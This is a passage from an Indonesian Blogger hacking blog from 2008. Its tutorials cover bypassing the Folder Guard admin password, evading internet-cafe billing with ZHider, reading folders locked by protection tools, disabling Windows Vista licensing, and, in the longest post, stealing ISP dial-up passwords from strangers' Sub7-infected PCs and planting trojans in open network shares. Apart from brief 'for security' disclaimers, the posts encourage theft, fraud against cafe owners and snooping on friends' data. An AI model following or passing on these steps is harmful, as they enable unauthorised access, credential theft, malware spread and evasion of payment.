dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.<br /> <br /><span class="fullpost"><br /> <br />Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.<br /><br /><br />Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info. <br /><br /><br />Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey” /pw , isi nama shortcutnya dengan reset.<br /><br /> <br /><a href="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ88w9n3kI/AAAAAAAAAB4/5QbOsYfHcyY/s1600-h/pic5.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ88w9n3kI/AAAAAAAAAB4/5QbOsYfHcyY/s320/pic5.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5189339685270838850" /></a><br /><br />lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset” berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem. <br /><br /><br /> <br /><br /><br /><br /><br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/menjebol-password-folder-guard-pro-52.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/menjebol-password-folder-guard-pro-52.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:25:00+07:00'>12:25 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=193687692134022521' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=193687692134022521' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=193687692134022521&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/hacker' rel='tag'>hacker</a>, <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20Hacking' rel='tag'>Tutorial Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='5751579299086736237' itemprop='postId'/> <a name='5751579299086736237'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/mendapatkan-account-isp-gratis.html'>Mendapatkan account ISP gratis!</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-5751579299086736237' itemprop='description articleBody'> Pertama2 saya hanya ingin menegaskan bahwa artikel ini hanyalah sebuah abstraksi yang saya gambarkan untuk mempermudah pemahaman kita mengenai cara pendeteksian kelemahan atau celah sebuah sistem dan BUKAN untuk diterapkan!!! namun dengan gambaran ini saya harap para Admin ISP manapun juga dapat memperketat proteksinya.. =)<br /><br />Untuk memulai percobaan pastikan anda telah mendownload beberapa tool berikut ini :<br /><br />1. mIRC v x.x (berapa aja boleh)<br />2. Legion - Open Share Scanner v.2.1<br />3. Sub-7 Defcon Edition v.8 <br />4. Sub-7 v.2.2<br /><br />Cara pertama buka mIRC lalu masuklah ke channel lokal, lalu lakukan /whois ke beberapa orang sampai anda mendapatkan ISP yang anda inginkan.<br /><br />misal : abo3ng is abo3ng@202-159-182-191.client.indo.net.id * Be Bo3nx<br /><br />berarti kini telah kita dapatkan satu target yg menggunakan indosat sbg ISPnya, sekarang lakukan /dns pada 202-159-182-191.client.indo.net.id sbg hostnya, maka dalam beberapa saat akan muncul <br /><span class="fullpost"><br />*** Resolved 202-159-182-191.client.indo.net.id to 202.159.182.191<br /><br />Setelah itu kita tinggal mengkonversi hasil tadi ke network kelas C, sehingga menjadi 202.159.0.0, ini adalah target kita yang sesungguhnya. Buka Sub7 2.2 lalu masuk ke Connection > Scanner > Local Scanner. Masukkan Start IPnya dengan 202.159.0.0 dan 202.159.255.255 sebagai akhirannya, lalu klik scan. Proses ini membutuhkan waktu yang lumayan lama, setelah berhasil, buka Sub7 Defcon dan masukkan hasil tadi ke field di atas, lalu klik connect. Jika anda diminta password u/ mengaksesnya maka lupakan saja, namun bila ia tidak meminta password, mulailah tersenyum karena kita ada sedikit kerjaan menarik disini. Pertama yang harus kamu lakukan adalah masuk ke Advance > Passwords > Retrieve RAS Passwords. Di dalam sini listing username dan password ISP berceceran dan siap u/ kita pungut, tapi pastikan anda telah mengetahui dial up access number ke ISP tsb (bisa juga anda cari di situs ISPnya). Selanjutnya masuk ke Connection > Server Options lalu set password, kita tidak mengingink!<br />an orang lain connect ke internet ketika kita sedang membajak accountnya. Aktifkan IP Notify sedemikian rupa sehingga anda dapat membuat server melakukan scan u/ anda jika dibutuhkan, ISP terkadang mengontrol orang iseng yang melakukan scanning dan menangkapnya! <br /><br />Saya setuju bila hacker2 kelas kakap mengatakan bahwa menggunakan Sub7 u/ mencuri account hanyalah u/ orang dungu, tapi saya lebih suka cara ini daripada harus menghadapi resiko yang tinggi yang menyebabkan kita masuk penjara bahkan sebelum kita mencapai target. Bila anda bertanya mengapa menggunakan Sub7 2.2 hanya u/ scanning?!? Yah, paling tidak ini adalah scanner yang cukup handal dibanding Defcon, meski ia tidak mengizinkan IRC Bot atau IP Notify =) -Mad<br /><br />Cara kedua adalah dengan mencari Open share dan mengupload trojan. Untuk melakukan ini buka Legion Scanner dan lakukan scan pada range misal 202.159.0.0 s/d 202.159.5.255 ketika muncul hasil dari scan tadi masuk ke My Computer alamatnya menjadi \\ diikuti dg IP, contohnya seperti ini \\202.159.4.128 lalu tunggu sejenak proses loading dan setelah itu anda mungkin akan diminta password untuk mengaksesnya, bila iya lupakan IP tadi dan lanjutkan scanning. Ketika anda mendapati address yang tidak meminta password, lihatlah namanya, lalu cari akses ke drive 'C' jika anda mendapatkannya, masuklah ke dalam drive tersebut, lalu akses windows > start menu > programs > startup, lalu paste trojan server kedalamnya, pastikan trojan yang anda kirimkan ke drive tsb tidak memiliki tampilan yang mencurigakan saat bekerja misalnya mengeluarkan window atau logo pembuatnya dll. Yang perlu anda lakukan berikutnya adalah bikin secangkir kopi sambil relax menunggu lawan merestart komputernya dan k!<br />emudian menghapus jejak yang ada di startup lawan ketika data yang kita butuhkan di komputer lawan telah kita dapat =P mudah bukan? <br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/mendapatkan-account-isp-gratis.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/mendapatkan-account-isp-gratis.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:24:00+07:00'>12:24 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=5751579299086736237' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=5751579299086736237' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=5751579299086736237&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/hacker' rel='tag'>hacker</a>, <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20Hacking' rel='tag'>Tutorial Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='2325418202138914233' itemprop='postId'/> <a name='2325418202138914233'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/mencurangi-hampir-semua-jenis-billing.html'>Mencurangi (hampir) Semua Jenis Billing Warnet</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-2325418202138914233' itemprop='description articleBody'> Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga. <br /><br />Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi <br />Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.<br />Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)<br />Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!<br /><br />Penasaran mau tau caranya ? Baca aja sampai habis ! <br />Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?<br /><br />Ini dia caranya ...<br />Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.<br />Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan <br /><br />Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.<br /><span class="fullpost"><br />Yang harus disiapkan:<br />1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.<br />Aku nemunya pas smp tapi baru sekarang kepake ^^<br />2. Muka bego<br />3. Mental yang kuat<br /><br />Langkah-langkahnya:<br /><br />01. Masuk warnet dan pasang muka bego biar ga dicurigai operator<br />02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.<br />03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.<br />04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.<br />05. Saat masuk login screen, login aja seperti biasa.<br />06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.<br />07. Setelah ZHider dijalankan langsung aja logout.<br />08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!<br />09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.<br />10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana<br />11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.<br />12. Logout. SIapkan muka bego, lalu bayar tarif.<br /><br />Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.<br /><br />Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider<br /><br />CTRL+ALT+Z Menyembunyikan jendela aktif<br />CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan<br />CTRL+ALT+L Menampilkan dialog zhider<br />CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.<br /><br />Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan <br />Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.<br /><br />Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk). <br /><br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/mencurangi-hampir-semua-jenis-billing.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/mencurangi-hampir-semua-jenis-billing.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:22:00+07:00'>12:22 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=2325418202138914233' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=2325418202138914233' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=2325418202138914233&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/hacker' rel='tag'>hacker</a>, <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20Hacking' rel='tag'>Tutorial Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='http://3.bp.blogspot.com/_FxZKHy6v3_I/SAQ7TQ9n3jI/AAAAAAAAABw/IBhmnbUgLzw/s320/pic4.bmp' itemprop='image_url'/> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='2310928246998342199' itemprop='postId'/> <a name='2310928246998342199'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/membongkar-file-file-terproteksi.html'>Membongkar File-file terproteksi</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-2310928246998342199' itemprop='description articleBody'> Memang tidak mungkin melihat sebiji virus atau bakteri hanya dengan mata telanjang. Mungkin itulah sebabnya mengapa di zaman Fir'aun belum dikenal istilah virus ataupun bakteri. Tetapi dengan ditemukannya mikroskop, makhluk-makhluk mikroskopis yang kerap kali menyusahkan manusia tersebut berhasil dilihat, ditelanjangi, dan dianalisis secara detail. Kesimpulannya, apa yang dapat kita lihat sangat bergantung pada perlengkapan (instrumen) apa yang kita gunakan. <br />Tidak berbeda jauh dengan dunia nyata, dalam dunia komputer pun hukum dasar itu tetap berlaku. Dengan peralatan (baca: software) yang berbeda, kita akan melihat file/folder yang berbeda pula. Sebagai contoh jika menggunakan tools bawaan windows yakni windows explorer untuk menjelajahi isi hard disk, pada kondisi defaultnya kita tidak akan dapat melihat file-file dan folder yang diset beratribut hidden dan system, kecuali jika kita sedikit melakukan perubahan setting pada folder option atau di registrynya. <br /><br />Akan sangat berbeda ceritanya ketika kita menggunakan tools lain misalnya Partition Magic 8. Dengan aplikasi Partition Browser dari Partition Magic 8 ini, kita dapat melihat seluruh file dan folder beratribut hidden dan system (super hidden) tanpa perlu melakukan perubahan setting di folder option atau registry terlebih dahulu. Saat ini sudah sangat banyak aplikasi yang ditawarkan guna melindungi arsip atau program-program rahasia kita di komputer sehingga tidak mudah dilacak dan dibongkar oleh tangan-tangan lain. Aplikasi-aplikasi tersebut ada yang bersifat freeware serta sebagian lainnya berlisensi. Selain itu, metode proteksi yang ditawarkan setiap software tersebut juga berbeda-beda pula. <br />Salah satu aplikasi freeware yang sempat penulis coba adalah Folder Lockbox yang dapat diunduh dari situs resminya www.folderlockbox.com atau dapat juga diunduh di www.freewarefiles.com. Meskipun bersifat freeware, aplikasi ini cukup bagus karena tidak meninggalkan jejak pada popup menu dan juga dilindungi dengan password. <br /><br />Ketika membukanya, kita harus memasukkan password terlebih dahulu. Dengan aplikasi ini sebuah folder akan disembunyikan sehingga sekalipun dicari dengan fasilitas search milik windows atau kita browse menggunakan Partition Magic tetap tidak akan ketemu. Hebatnya lagi, aplikasi ini dapat diaktifkan sampai ke safe mode (tetapi tidak akan aktif pada safe mode with command prompt dan hanya dapat digunakan untuk melindungi satu folder saja). Dengan begitu, untuk kelas yang benar-benar pemula dan belum terbiasa mengakses windows lewat safe mode with command prompt atau dos, tingkat proteksi folder/file dengan aplikasi ini sudah cukup lumayan. Benarkah demikian?<br /><span class="fullpost"> <br />Jika anda pernah menginstall aplikasi bernama Paragon Rescue Kit 4 yang membundel salah satu aplikasi bernama Image Explorer, maka anda akan mulai meragukan kehandalan proteksi dari Folder Lockbox. Dengan Image Explorer tersebut, kita dapat melihat dan menjelajah isi folder yang sedang diproteksi oleh folder lockbox serta bisa membuka dan memindahkan setiap isinya ke tempat lain sekalipun kita hanya booting lewat mode normal. Jika ingin mencobanya, anda bisa menemuinya di www.paragon.ag atau di dalam CD majalah Komputer Aktif edisi 145. <br /><br />Tampilan antar muka dari Image Explorer sangat sederhana dengan beberapa menu pada popup menunya, diantaranya export yang berfungsi untuk mengcopy isi folder tertentu ke tempat lain serta fitur-fitur lain yang cukup menarik (aku malas merincinya satu-persatu, capek ngetiknya) Selain Folder Lockbox, tools lain yang juga bisa ditelanjangi sistem proteksinya oleh Image Explorer yang sempat aku coba (karena keterbatasan pengetahuanku) adalah Hide File and Folder serta Easy File and Folder Protector yang bisa dicomot dari www.softstack.com. Silahkan anda mencoba sendiri aplikasi-aplikasi protektor lain yang kian banyak bertebaran dimana-mana misalnya Lock Folder, Folder Security, dan masih banyak lagi (persediaan hampir tak terbatas). <br />Sekedar informasi, file executable dari Image Explorer ini hanya berukuran sekitar 960 KB, cukup mungil dan praktis untuk memulai kebiasaan mengintip dan mengerjai data-data rahasia teman. Setelah Paragon Rescue Kit 4 diinstall, anda dapat mengcopy Image Explorer ke komputer lain tanpa harus menginstallnya lagi. Beginilah tampilan antar muka dari aplikasi Image Explorer: <br /><br />Gambar<br /><br /><a href="http://3.bp.blogspot.com/_FxZKHy6v3_I/SAQ7TQ9n3jI/AAAAAAAAABw/IBhmnbUgLzw/s1600-h/pic4.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_FxZKHy6v3_I/SAQ7TQ9n3jI/AAAAAAAAABw/IBhmnbUgLzw/s320/pic4.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5189337872794639922" /></a> <br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/membongkar-file-file-terproteksi.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/membongkar-file-file-terproteksi.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:19:00+07:00'>12:19 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=2310928246998342199' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=2310928246998342199' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=2310928246998342199&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/hacker' rel='tag'>hacker</a>, <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20Hacking' rel='tag'>Tutorial Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='6463234138138689746' itemprop='postId'/> <a name='6463234138138689746'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/cara-mengcrack-windows-vista-final.html'>Cara Mengcrack Windows Vista Final Release</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-6463234138138689746' itemprop='description articleBody'> Menurut Microsoft Bahwa Windows Vista andalanya susah di jebol atau di Crack.padahal hal itu tidak bisa di benarkan 100%.<br /><br />Saya akan memberitahukan caranya Mengrack Windows Vista Final Release.Tahapannya sebagai berikut:<br /><br /> <br /><br />1. klik bendera windows|Klik Run|dan ketik Cmd.<br /><br />2. setelah Muncul command prompt ketikan slmgr.vbs -dlv lalu tekan enter.fungsi dari perintah slmgr.vbs -dlv adalah untuk memeriksa Apakah Komponen Dari Windows untuk mengaktifkan Vistanya Berjalan. <br /><br />3. klik bendera windows|klik Run|dan ketik Services.msc,Cari software Licensing,dan pilih Disable di startup type.setelah itu Cari Ui Notification dan pilih Disable di startup type.setelah selesai klik close.<br /><br />4. klik bendera windows|Klik Run|dan ketik Cmd|ketikan slmgr.vbs -dlv lalu tekan enter. Setelah software licensing di disable dan juga UI notification, maka Komponen Windows Untuk Menjalankan Slsvc.exe Akan tidak jalan.<br /><br /> <span class="fullpost"><br /><br />Catatanp:<br /><br /> setelah Melakukan tahapan di atas yang perlu anda perhatikan adalah:<br /><br />1.Anda tidak bisa Menjalankan Control Panel 2.Anda tidak bisa Menjalankan Properties kalau di klik kanan di desktop.<br /><br />3.Anda tidak bisa Menjalankan Properties kalau di klik kanan di My Computer.<br /><br />Tetapi jangan khawatir karena anda masih bisa menginstall Program baru. dan semua aplikasi windows seperti Windows Media player,dan lain-lain. masih bisa di jalankan.<br /><br /> <br /><br />*********************<br /><br />* SEMOGA MEMBANTU *<br /><br />*********************<br /><br /><br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/cara-mengcrack-windows-vista-final.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/cara-mengcrack-windows-vista-final.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:15:00+07:00'>12:15 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=6463234138138689746' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=6463234138138689746' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=6463234138138689746&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ4Mw9n3gI/AAAAAAAAABY/BtYI0TB0G8U/s320/pic1.bmp' itemprop='image_url'/> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='8278314138125979608' itemprop='postId'/> <a name='8278314138125979608'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/cara-menemukan-password-administrator.html'>Cara Menemukan Password Administrator Windows XP</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-8278314138125979608' itemprop='description articleBody'> Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk “berkembang” dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan OS Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja. <br />Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah yang membuat para karyawan sulit untuk berkembang. Memang harus diakui ada sisi baik dan ada juga sisi buruk dari penerapan IT Policy.<br /><br />Tapi kali ini kita sedikit mengabaikan sisi baik dari IT policy tersebut dan lebih mensupport para karyawan untuk bisa berkembang.<br /><br />Artikel ini sedikit memberi gambaran bahwa setiap ada kesulitan pasti ada jalan keluar.<br /><br />Di dunia maya ini banyak sekali artikel yang membahas tentang cara membongkar password administrator Windows XP bahkan sudah banyak program yang dibuat untuk mereset ataupun mengganti password tersebut. Tentunya jika kita ingin bermain manis, kita tidak perlu 